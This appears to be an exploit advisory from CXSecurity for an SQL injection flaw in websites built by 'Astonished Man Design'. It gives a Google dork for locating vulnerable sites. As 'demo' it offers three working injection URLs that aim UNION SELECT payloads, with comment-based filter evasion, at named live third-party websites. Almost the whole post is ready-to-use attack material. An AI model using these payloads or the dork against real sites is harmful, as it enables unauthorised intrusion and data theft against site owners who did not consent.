Astonished Man Design – Sql Injection Vulnerability – CXSecurity.com




*********************************************************
#Exploit Title: Astonished Man Design – Sql Injection Vulnerability
#Date: 2023-09-15
#Exploit Author: Behrouz Mansoori
#Google Dork: “website by Astonished Man Design”
#Category:webapps
#Tested On: Mac, Firefox
Proof of Concept:
### Demo :
https://adamsangelsministry.org/news.php?id=-141%27%20%23dwjwhfuh%0Aunion%20%23djcbhdghs%0Aselect%201,2,3,version(),5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=%27news_data%27–+
https://jansrealty.net/contact.php?id=-19%27%20/*!12345union*/%20select%20version(),2,3–+
https://www.collectableweapons.com/listings.php?id=-285%27%20/*!12345union*/%20select%201,2,3,version(),5,6,7,8,9,10,11–+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:’yyyy-MM-dd’ }} {{ x.ux * 1000 | date:’HH:mm’ }} CET+1


{{ x.comment }}


Copyright 2023, cxsecurity.com

 

Back to Top